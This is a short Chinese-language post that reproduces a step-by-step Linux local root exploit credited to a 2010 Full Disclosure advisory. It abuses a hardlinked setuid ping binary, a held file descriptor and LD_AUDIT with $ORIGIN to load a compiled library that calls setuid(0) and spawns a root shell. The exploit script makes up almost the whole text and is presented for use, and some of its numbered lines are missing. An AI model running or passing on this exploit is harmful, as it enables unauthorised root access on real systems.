编写这样一个脚本,

 
  
  1. mkdir /tmp/exploit 
  2. ln /bin/ping /tmp/exploit/target 
  3. exec 3< /tmp/exploit/target 
  4. rm -rf /tmp/exploit 
  5. cat >> /tmp/payload.c <<EOF 
  6. void __attribute__((constructor)) init() 
  8.     setuid(0); 
  9.     system("/bin/bash"); 
  11. EOF 
  12. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 
  13. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 
 
  
下面是我的使用效果,如下
 
  
 
  
 原文链接:http://seclists.org/fulldisclosure/2010/Oct/257